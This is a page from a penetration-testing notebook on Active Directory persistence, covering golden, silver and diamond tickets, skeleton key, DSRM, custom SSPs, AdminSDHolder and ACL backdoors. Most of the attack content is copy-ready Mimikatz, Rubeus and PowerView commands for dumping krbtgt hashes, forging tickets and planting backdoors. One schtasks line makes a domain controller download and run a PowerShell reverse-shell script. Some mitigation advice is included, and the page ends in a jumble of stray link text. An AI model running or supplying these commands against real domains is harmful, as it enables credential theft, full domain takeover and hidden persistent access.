0xSs0rZ
  • Hello World
  • Whoami
  • Interesting Books
  • Pentest
    • CheckLists
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Docker
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
      • VNC Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Bypass 302
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • RCE in Login Page
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • SSO
        • OAuth / Okta Misconfiguration
        • SCIM
        • SAML
      • 2FA / OTP
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • CSV Injection
      • CSS Exfiltration
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Jetty
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
      • KeyCloak
      • Jupyter Notebook
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner & other scanning methods
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • Path Traversal
      • Rate Limiting
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • Commvault
      • CrushFTP
      • CyberPanel
      • D-Link
      • Denodo Scheduler
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Invision Community
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • Salesforce
      • SAP
      • SolarWinds
      • SonicWall
      • Splunk
      • Spring
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • Synology
      • TeamViewer
      • TP Link
      • vBulletin
      • Vite.js
      • VMWare
      • Wazuh
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • dMSA - Windows Server 2025
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • MDT
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Token Impersonation
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Covering Tracks - Linux
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit / Hardening
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
      • Recon / Initial Access / Enum
      • AWS CLI
      • Pacu
      • IAM
      • VPC - Virtual Private Cloud
      • EC2 - Elastic Compute Cloud
      • Lambda Functions
      • Containers
      • CodeBuild
      • S3 - Simple Storage Service
      • RDS - Relational Database Service
      • DynamoDB
      • EBS - Elastic Block Store
      • AMI
      • SecretsManager
      • Cloudtrail
      • Route 53
      • Cognito
      • SNS - Simple Notification Service
      • Tools
      • Resources
    • GCP
    • Kubernetes
    • Tools
  • Labs
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Bypass Bitlocker
    • Resources
  • CTF
    • OSINT
    • Forensic
      • Labs
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
    • Write Up
      • Deadface CTF 2024
      • Intigriti 1337UP Live
      • UMDCTF 2025
Powered by GitBook
On this page
  • Tool - SharPersist
  • Install Chrome Extension For Persistence
  • AD DS Persistence
  • Golden Tickets
  • Mimikatz on DC to get krbt hash
  • DCSync (no code execution on the target DC) to get krbtgt hash
  • Create golden ticket
  • Mitigation
  • Silver Tickets
  • Ex 1 : Access to file system on the DC
  • Ex 2 : Achieve command execution using silver ticket
  • Mitigation
  • Diamond Tickets
  • Skeleton Key
  • Mitigation
  • DSRM - Directory Services Restore Mode
  • Custom SSP
  • Way 1
  • Way 2
  • AdminSDHolder
  • Well Known abuse of Protected Groups
  • Add FullPermissions to a user
  • Other permissions: ResetPassword, WriteMembers
  • Run SDProp manually
  • Check Domain Admins permission
  • Exploit
  • Rights Abuse
  • FullControl
  • DCSync
  • Security Descriptors
  • WMI
  • PS Remoting backdoor
  • Remote Registry
  • msDS-AllowedToDelegateTo
  • With Powershell
  • With Kekeo
  • With Rubeus
  • Persistence in Linux
  1. Pentest
  2. Internal Pentest

Persistence

PreviousTrustsNextTiering

Last updated 2 months ago

Tool - SharPersist

Install Chrome Extension For Persistence

AD DS Persistence

Insomnihack 2024

Or in French - LeHack 2023:

Golden Tickets

krbtgt hash could be used to impersonate any user

It is recommended to change the password of krbtgt account twice as password history is maintained for the account

Mimikatz on DC to get krbt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync (no code execution on the target DC) to get krbtgt hash

SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

krbtgt hash could also be dump from NTDS.dit

Create golden ticket

Using AES keys makes the attack more silent

From any machine connected with DC

Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

BetterSafetyKatz

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Rubeus

Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmd

Mitigation

The following security control should be implemented to mitigate a Golden Ticket:

  • Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised. Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used.

Silver Tickets

Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS) - Encrypted and signed by the hash of the service account (golden ticket is signed by the hash of krbtgt)

Ex 1 : Access to file system on the DC

Using AES key is more silent

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Can be use for other services: HOST, RPCSS, HTTP, etc.

Ex: HTTP With Rubeus

Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /ptt

Ex 2 : Achieve command execution using silver ticket

HOST SPN allow us to schedule a task on the target

BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task

schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net-WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""

schtasks /Run /S dc.domain.local /TN "STCheck"

Mitigation

The following security controls should be implemented to mitigate a Silver Ticket:

  • Change all computer object (including Domain Controller) passwords every 30 days. Malicious actors can establish persistence in Active Directory using a computer object’s password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique.

  • Ensure computer objects are not members of privileged security groups, such as the Domain Admins security group. If malicious actors obtain a computer object’s password hash, then they gain any privileges the computer object has in the domain.

  • Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory. All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement.

Diamond Tickets

Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account

More opsec safe than a golden ticket

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt

/tgtdeleg option in place of credentials in case we have access to a domain user

Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt

Skeleton Key

Patch a DC (lsass process) so that it allows access as any user with a single password

Skeleton Key is not opsec safe ad is known to caus issues with AD CS

Inject a skeleton key (password is mimikatz) on a DC.

DA privileges required

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

Now, we can access any machine with a valid username and password as "mimikatz"

Enter-PSSession -Computername dc -Credential domain\Administrator

In case lsass is running as a protected process, we need mimidriv.sys on disk of the target DC

Very noisy in logs - Service installation (Kernel mode driver)

mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

Modify the default key

For example, to use "S3c3rtP@ss", compute its RC4 and split it into 8 bytes stubs:

56aa742a
6bebb9ca
62fc9f70
a2e00cd3

Reverse the values by 2 bytes

2a74aa56
cab9eb6b
709ffc62
d30ce0a2

Prepend 0x to each and modify kiwikey array value in the code linked above

DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2}

Mitigation

The following security controls should be implemented to mitigate Skeleton Key:

  • Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.

  • Run the LSASS process in protected mode. This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed.

  • Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.

  • Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.

  • Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.

DSRM - Directory Services Restore Mode

There is a local admin "Administrator" on every DC whose password is DSRM. DSRM password is required when a server is promoted to DC and it is rarely changed

Dump DSRM password - DA privileges needed

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

Compare the Administrator hash with the Administrator hash of below command

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc

Logon Behavior for the DSM account needs to be changed before passing the hash

Enter-PSSession -Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

or

Invoke-Command -ComputerName dc -ScriptBlock {
    New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'

ls \\dc\C$

To use PSRemoting, we must force NTLM authentication:

Enter-PSSession -ComputerName dc -Authentication Negotiate

Custom SSP

Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP

Mimikatz mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server

All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log

Way 1

Drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

Way 2

Inject into lsass

Not stable with Server 2019 and Server 2022

Invoke-Mimikatz -Command '"misc::memssp"'

AdminSDHolder

Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL

Well Known abuse of Protected Groups

Protected Group
Abuse

Account Operators

Can modify DA/EA/BA groups. Can modify nested groups within these groups

Backup Operators

Backup GPO, edit to add SID of controlled account to a privileged group and Restore

Server Operators

Run a command as system (using the disabled Browser service)

Print Operators

Copy ntd.dit backup, load device drivers

Add FullPermissions to a user

With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanisme by adding a user with Full Permissions to the AdminSDHolder object

With PowerView

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose

Other permissions: ResetPassword, WriteMembers

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

Run SDProp manually

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

For pre-Server 2008:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check Domain Admins permission

PowerView

get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -matche "username}

AD Module

(Get-Acl -Path 'AD:\C:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}

Exploit

FullControl

PowerView

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

AD Module

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

ResetPassword

PowerView

Set-DomainUserPassword -Idenity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

AD Module

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Rights Abuse

With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync

FullControl

Add FullControl rights:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose

DCSync

Add rights for DCSync:

With PowerView

Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose

With AD Module and RACE toolkit

https://github.com/samratashok/RACE

Set-ADCL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Security Descriptors

Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required

WMI

On local machine for user1

Set-RemoteWMI -SamAccoutName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose

On remote machine with explicit credentials

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose

On remote machine remove permissions

Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose

PS Remoting backdoor

Not stable after August 2020 patches

On local machine for user1

Set-RemotePSRemoting -SamAccoutName user1 -Verbose

On remote machine for user1 without explicit credentials

Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Verbose

On remote machine, remove permissions

Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Remove

Remote Registry

With DAMP

Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose

As user1, retrieve machine account hash

Get-RemoteMachineAccountHash -ComputerName dc -Verbose

Retrieve local account hash

Get-RemoteLocalAccountHash -ComputerName dc -Verbose

Retrieve domain cached credentials

Get-RemoteCachedCredential -ComputerName dc -Verbose

msDS-AllowedToDelegateTo

SeEnableDelegationPrivilege on the DC and full rights on the target user - default for Domain Admins and Enterprise Admins

With Powershell

# PowerView

Set-DomainObject-Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject-Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject-SamAccountName devuser -Xor @{"useraccountcontrol"="16777216"}

Get-DomainUser –TrustedToAuth

# AD Module

Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser Add @{@{'msDS AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local)} -Verbose
Set-ADAccountControl-Identity devuser -TrustedToAuthForDelegation $true

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

With Kekeo

kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!

kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

With Rubeus

# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local

Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence in Linux

To effectively change the KRBTGT user object’s password hash, and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers such that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, it is important to ensure that sufficient time is allowed between password resets to ensure the new password has had time to replicate to all Domain Controllers. For more information, see Microsoft’s and to assist with resetting the KRBTGT password.

List of SPN:

Create User objects with SPNs as . gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, if creating user objects with SPNs as gMSAs is not feasible, set a minimum 30-character password that is unique, unpredictable and managed is set.

Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘’.

Implement Microsoft’s . Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection.

Restrict driver execution to an approved set. Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens it against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoft’s .

With RACE toolkit:

Get machine account hash for

guidance
PowerShell script
https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
https://adsecurity.org/?page_id=183
group Managed Service Accounts (gMSAs)
https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611
Enterprise Access Model
vulnerable driver blocklist
Windows Defender Application Control
https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
Group Privileges
DCSync
https://github.com/samratashok/RACE
Exploit
silver ticket attack
GitHub - mandiant/SharPersistGitHub
Silently Install Chrome Extension For PersistenceSyntax-Err0r
PAC Validation, The 20 Minute Rule and Exceptions (BHUSA 2014 part deux)
Logo
Golden ticketsThe Hacker Recipes
Silver & Golden Ticketshackndo
Silver tickets | The Hacker Recipes
A Diamond in the RuffTrustedSec
Skeleton Key Malware AnalysisSecureworks
Skeleton key | The Hacker Recipes
Diamond tickets | The Hacker Recipes
Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)Active Directory Security
Sneaky Active Directory Persistence #13: DSRM Persistence v2Active Directory Security
Domain Persistence: DSRM - Hacking ArticlesHacking Articles
Logo
Appendix C - Protected Accounts and Groups in Active DirectoryMicrosoftLearn
Logo
GitHub - samratashok/RACE: RACE is a PowerShell module for executing ACL attacks against Windows targets.GitHub
Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin RightsActive Directory Security
AdminSDHolder | The Hacker Recipes
AD-Pentesting-Tools/Invoke-SDPropagator.ps1 at main · theyoge/AD-Pentesting-ToolsGitHub
Remote Hash Extraction On Demand Via Host Security Descriptor ModificationPosts By SpecterOps Team Members
Logo
